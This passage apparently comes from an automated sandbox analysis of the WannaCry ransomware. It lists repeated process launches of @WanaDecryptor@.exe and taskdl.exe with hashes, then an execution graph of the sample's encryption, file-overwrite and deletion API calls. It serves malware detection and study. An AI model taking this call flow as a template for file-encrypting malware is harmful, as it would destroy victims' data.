                                                          Target ID:175
                                                          Start time:11:59:53
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:176
                                                          Start time:11:59:53
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:177
                                                          Start time:11:59:53
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:178
                                                          Start time:11:59:53
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:179
                                                          Start time:11:59:53
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:180
                                                          Start time:11:59:54
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:181
                                                          Start time:11:59:54
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:182
                                                          Start time:11:59:54
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:183
                                                          Start time:11:59:54
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:184
                                                          Start time:11:59:54
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:185
                                                          Start time:11:59:54
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:186
                                                          Start time:11:59:54
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:187
                                                          Start time:11:59:54
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:188
                                                          Start time:11:59:54
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:189
                                                          Start time:11:59:55
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:190
                                                          Start time:11:59:55
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:191
                                                          Start time:11:59:55
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:192
                                                          Start time:11:59:55
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:193
                                                          Start time:11:59:55
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:194
                                                          Start time:11:59:55
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:195
                                                          Start time:11:59:55
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:196
                                                          Start time:11:59:55
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:197
                                                          Start time:11:59:56
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:198
                                                          Start time:11:59:56
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:199
                                                          Start time:11:59:56
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:200
                                                          Start time:11:59:56
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:201
                                                          Start time:11:59:56
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:202
                                                          Start time:11:59:56
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:203
                                                          Start time:11:59:56
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:204
                                                          Start time:11:59:56
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:205
                                                          Start time:11:59:57
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:206
                                                          Start time:11:59:57
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:207
                                                          Start time:11:59:57
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:208
                                                          Start time:11:59:57
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:209
                                                          Start time:11:59:57
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:210
                                                          Start time:11:59:57
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:211
                                                          Start time:11:59:57
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                            Execution Graph

                                                            Execution Coverage:42.3%
                                                            Dynamic/Decrypted Code Coverage:99.7%
                                                            Signature Coverage:34.5%
                                                            Total number of Nodes:799
                                                            Total number of Limit Nodes:127
1671 10003fb4 CryptImportKey 1670->1671 1671->1667 1672 10003fd1 _local_unwind2 1671->1672 1672->1646 1674 10003bb0 3 API calls 1673->1674 1675 10003efd 1674->1675 1675->1644 1677 10003c1b 1676->1677 1678 10003c0e CryptDestroyKey 1676->1678 1679 10003f00 7 API calls 1677->1679 1678->1677 1680 10003b1e 1679->1680 1680->1544 1680->1545 1681->1552 1683 10004099 GlobalAlloc 1682->1683 1686 10004091 _local_unwind2 1682->1686 1685 100040b5 CryptExportKey 1683->1685 1683->1686 1685->1686 1687 100040eb CreateFileA 1685->1687 1686->1554 1687->1686 1688 10004116 WriteFile 1687->1688 1688->1686 1689 1000412e _local_unwind2 1688->1689 1689->1554 1691 10003c67 1690->1691 1692 10003c5d 1690->1692 1699 10004170 1691->1699 1692->1555 1694 10003c7f 1695 10003c90 CreateFileA 1694->1695 1696 10003c88 1694->1696 1697 10003cb0 SetFilePointer WriteFile WriteFile 1695->1697 1698 10003ce6 GlobalFree 1695->1698 1696->1555 1697->1698 1698->1555 1712 10006bd0 1699->1712 1702 100041c2 CryptGetKeyParam 1704 10004206 GlobalAlloc 1702->1704 1705 100041e9 1702->1705 1703 100041b7 1703->1694 1707 10004254 1704->1707 1708 10004237 1704->1708 1705->1694 1706 100042fc 1706->1694 1707->1706 1709 1000427e CryptEncrypt 1707->1709 1708->1694 1709->1707 1710 1000431b GlobalFree 1709->1710 1711 1000432f 1710->1711 1711->1694 1711->1711 1713 1000417a CryptExportKey 1712->1713 1713->1702 1713->1703 1834 10003a10 InitializeCriticalSection 1714->1834 1716 100015b8 1835 10003a10 InitializeCriticalSection 1716->1835 1718 100015c6 1719 100015d3 ??2@YAPAXI 1718->1719 1719->1572 1721 10003ac0 33 API calls 1720->1721 1722 10001843 1721->1722 1723 10001847 1722->1723 1724 1000185c GlobalAlloc 1722->1724 1725 10003ac0 33 API calls 1722->1725 1723->1574 1726 10001875 1724->1726 1727 1000187a GlobalAlloc 1724->1727 1725->1724 1726->1574 1728 10001892 InitializeCriticalSection CreateThread GetTickCount srand 1727->1728 1729 1000188d 1727->1729 1728->1574 1836 100029e0 1728->1836 1729->1574 1731 10004ce9 CopyFileA 
1730->1731 1732 10004cfb GetFileAttributesW 1730->1732 1731->1732 1733 10004dd5 1732->1733 1734 10004d0b GetCurrentDirectoryA 1732->1734 1738 10004df0 1733->1738 1735 10004d5b 1734->1735 1736 10004d9e sprintf 1734->1736 1735->1736 1854 10001140 6 API calls 1736->1854 1739 10006bd0 1738->1739 1740 10004dfa GetFileAttributesW 1739->1740 1741 10004e11 fopen 1740->1741 1742 10004f0f 1740->1742 1741->1742 1743 10004e2e fread fclose _wfopen 1741->1743 1748 10005480 SHGetFolderPathW wcslen 1742->1748 1743->1742 1744 10004e7c 1743->1744 1745 10004e85 _ftol sprintf 1744->1745 1746 10004ea8 sprintf 1744->1746 1747 10004ec9 sprintf fwrite fclose 1745->1747 1746->1747 1747->1742 1749 100054e1 SHGetFolderPathW wcslen 1748->1749 1750 100054d3 1748->1750 1752 10005513 1749->1752 1753 10005505 1749->1753 1859 100027f0 ??2@YAPAXI 1750->1859 1755 10004a40 16 API calls 1752->1755 1754 100027f0 168 API calls 1753->1754 1754->1752 1756 10005520 1755->1756 1757 10004a40 16 API calls 1756->1757 1758 1000552d 1757->1758 1758->1594 1760 10004ab9 wcsrchr 1759->1760 1761 10004aac 1759->1761 1762 10004ada wcschr 1760->1762 1763 10004acf 1760->1763 1761->1599 1764 10004b01 1762->1764 1765 10004af6 1762->1765 1763->1599 1766 10004b54 swprintf FindFirstFileW 1764->1766 1767 10004b0b SHGetFolderPathW wcslen 1764->1767 1765->1599 1769 10004bbc 1766->1769 1770 10004baf 1766->1770 1767->1766 1768 10004b33 wcsrchr 1767->1768 1768->1766 1771 10004b4c 1768->1771 1772 10004bca wcscmp 1769->1772 1770->1599 1771->1766 1773 10004c95 FindNextFileW 1772->1773 1774 10004be8 wcscmp 1772->1774 1773->1772 1775 10004cb0 FindClose 1773->1775 1774->1773 1776 10004c06 1774->1776 1775->1599 1776->1773 1777 10004c14 swprintf 1776->1777 1778 10004c4f wcscmp 1776->1778 1777->1776 1778->1773 1779 10004c5e swprintf 1778->1779 1779->1773 1781 10004756 1780->1781 1782 1000475b WriteFile CloseHandle 1780->1782 1781->1613 1782->1613 1784 100052ee 1783->1784 1785 100051cf GlobalAlloc 1783->1785 1784->1613 1785->1784 1786 
100051e6 1785->1786 2159 10005120 1786->2159 1788 10005215 CreateFileW 1789 10005239 GlobalFree 1788->1789 1790 1000524a MoveFileExW 1788->1790 1789->1613 1791 10005263 1790->1791 1792 100052cd GlobalFree FlushFileBuffers CloseHandle DeleteFileW 1790->1792 1791->1792 1793 10005269 GetDiskFreeSpaceExW 1791->1793 1794 1000529b WriteFile 1791->1794 1792->1784 1793->1791 1793->1792 1794->1792 1795 100052b3 Sleep 1794->1795 1795->1794 1796 100052bd Sleep 1795->1796 1796->1792 1796->1793 1798 10001135 1797->1798 1799 100010dd 1797->1799 1798->1589 1800 100010e5 WaitForSingleObject 1799->1800 1801 10001116 FindCloseChangeNotification CloseHandle 1799->1801 1802 10001102 1800->1802 1803 100010f5 TerminateProcess 1800->1803 1801->1589 1802->1801 1804 1000110a GetExitCodeProcess 1802->1804 1803->1802 1804->1801 1806 100055f2 GetDriveTypeW 1805->1806 1807 10005577 InterlockedExchangeAdd 1805->1807 1808 10005668 1806->1808 1810 10005604 InterlockedExchange 1806->1810 1807->1808 1809 1000558c 1807->1809 1808->1606 1812 1000559a GetDiskFreeSpaceExW 1809->1812 1815 100055c6 Sleep 1809->1815 1818 100055de GetDriveTypeW 1809->1818 1811 10005610 GetDriveTypeW 1810->1811 1813 10005653 1811->1813 1814 10005623 1811->1814 1812->1809 1812->1815 1817 100027f0 168 API calls 1813->1817 1816 10005060 14 API calls 1814->1816 1815->1812 1819 100055d3 1815->1819 1820 10005644 1816->1820 1817->1808 1818->1808 1821 100055f0 1818->1821 1819->1606 2170 10001910 wcscpy swprintf 1820->2170 1821->1811 2171 10001760 1823->2171 1826 100016fe ??3@YAXPAX 1828 10001728 1826->1828 1827 100016c5 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N ??3@YAXPAX 1827->1827 1829 100016fd 1827->1829 2184 10003a60 DeleteCriticalSection 1828->2184 1829->1826 1831 10001734 2185 10003a60 DeleteCriticalSection 1831->2185 1833 10001744 1833->1439 1833->1480 1834->1716 1835->1718 1839 100029f0 1836->1839 1840 10002a04 1839->1840 1841 10002b88 ExitThread 1839->1841 1840->1841 1842 10002a12 Sleep 
1840->1842 1843 10002a2f EnterCriticalSection 1840->1843 1845 10002a68 wcslen 1840->1845 1852 10002b46 ??3@YAXPAX 1840->1852 1853 10002b3a ??3@YAXPAX 1840->1853 1842->1840 1843->1840 1844 10002b6f LeaveCriticalSection 1843->1844 1844->1840 1844->1841 1846 10002ae4 DeleteFileW 1845->1846 1847 10002a76 MoveFileExW 1845->1847 1846->1840 1850 10002aef GetFileAttributesW SetFileAttributesW MoveFileExW 1846->1850 1848 10002a84 GetFileAttributesW 1847->1848 1849 10002aab swprintf MoveFileExW 1847->1849 1848->1849 1851 10002a90 GetFileAttributesW SetFileAttributesW MoveFileExW 1848->1851 1849->1840 1849->1846 1850->1840 1851->1849 1852->1840 1852->1844 1853->1852 1855 10001190 1854->1855 1856 10001198 fprintf fclose 1854->1856 1855->1733 1857 10001080 6 API calls 1856->1857 1858 100011c1 1857->1858 1858->1733 1869 10002300 ??2@YAPAXI 1859->1869 1861 100028b8 1927 10002ba0 1861->1927 1864 10002853 1864->1861 1866 10002885 ??3@YAXPAX 1864->1866 1916 10002940 1864->1916 1865 100028c1 1867 10002912 ??3@YAXPAX 1865->1867 1868 100028eb ??3@YAXPAX 1865->1868 1866->1864 1867->1749 1868->1865 1868->1867 1944 10003730 ??2@YAPAXI 1869->1944 1872 10002413 1946 10002f70 GetTempFileNameW CreateFileW 1872->1946 1873 100023af 1978 100036a0 1873->1978 1876 100023cd ??3@YAXPAX 1984 100037c0 1876->1984 1879 10002438 wcscmp 1882 1000262a FindNextFileW 1879->1882 1883 1000244f wcscmp 1879->1883 1880 100027c9 1880->1864 1881 10002642 FindClose 1884 1000265a 1881->1884 1899 10002686 1881->1899 1882->1881 1888 10002419 1882->1888 1883->1882 1885 10002466 swprintf 1883->1885 1886 10002940 103 API calls 1884->1886 1897 10003760 ??2@YAPAXI 1884->1897 1884->1899 1885->1888 1886->1884 1887 10002694 _wcsnicmp 1892 100026b4 1887->1892 1888->1879 1888->1881 1888->1882 1889 1000252b wcscmp 1888->1889 1894 100024b1 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 1888->1894 1914 100025bf 
wcsncpy wcsncpy 1888->1914 1949 100032c0 _wcsnicmp 1888->1949 1987 10002d60 wcsrchr 1888->1987 1889->1882 1891 10002542 wcscmp 1889->1891 1891->1882 1898 10002559 wcscmp 1891->1898 1905 10002706 1892->1905 1975 10003200 swprintf CopyFileW 1892->1975 1893 10002746 1896 10002771 ??3@YAXPAX 1893->1896 1912 1000276d 1893->1912 2006 10003620 1893->2006 1971 100035c0 ??2@YAPAXI 1894->1971 1903 100027b7 ??3@YAXPAX 1896->1903 1904 1000278e ??3@YAXPAX 1896->1904 1897->1884 1898->1882 1898->1888 1899->1887 1899->1892 1901 100026f9 1907 10002701 1901->1907 1908 10002708 1901->1908 1903->1880 1904->1903 1904->1904 1905->1893 1910 10002300 141 API calls 1905->1910 1976 10003280 swprintf CopyFileW 1907->1976 1977 10003240 swprintf CopyFileW 1908->1977 1910->1905 1912->1896 2004 10003760 ??2@YAPAXI 1914->2004 1917 10002953 1916->1917 1918 100029b1 DeleteFileW 1917->1918 1919 10002973 1917->1919 1920 100029aa 1917->1920 1921 1000295f 1917->1921 1918->1920 1923 10002200 100 API calls 1919->1923 1920->1864 2025 10002200 1921->2025 1925 1000297d 1923->1925 1924 10002969 1924->1864 1925->1920 1926 10002981 wcscat wcscat 1925->1926 1926->1920 1928 10002bcb wcslen 1927->1928 1929 10002cfd wcslen 1927->1929 1930 10002be2 1928->1930 1931 10002bef EnterCriticalSection wcslen ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 1928->1931 1932 10002d11 DeleteFileW 1929->1932 1933 10002d18 1929->1933 2137 10003010 1930->2137 1935 10002c48 ??2@YAPAXI 1931->1935 1938 10002c2d 1931->1938 1932->1933 1933->1865 1937 10002c65 1935->1937 1936 10002bec 1936->1931 1939 10003810 7 API calls 1937->1939 1938->1935 1940 10002c8a 1939->1940 1941 10002cde LeaveCriticalSection 1940->1941 1942 10002cd2 ??3@YAXPAX 1940->1942 1943 10002cae LeaveCriticalSection 1940->1943 1941->1865 1942->1941 1943->1865 1945 10002363 swprintf FindFirstFileW 1944->1945 1945->1872 1945->1873 1947 10002fc7 CloseHandle DeleteFileW 1946->1947 1948 10002fdd 1946->1948 1947->1948 1948->1888 1950 100032e2 
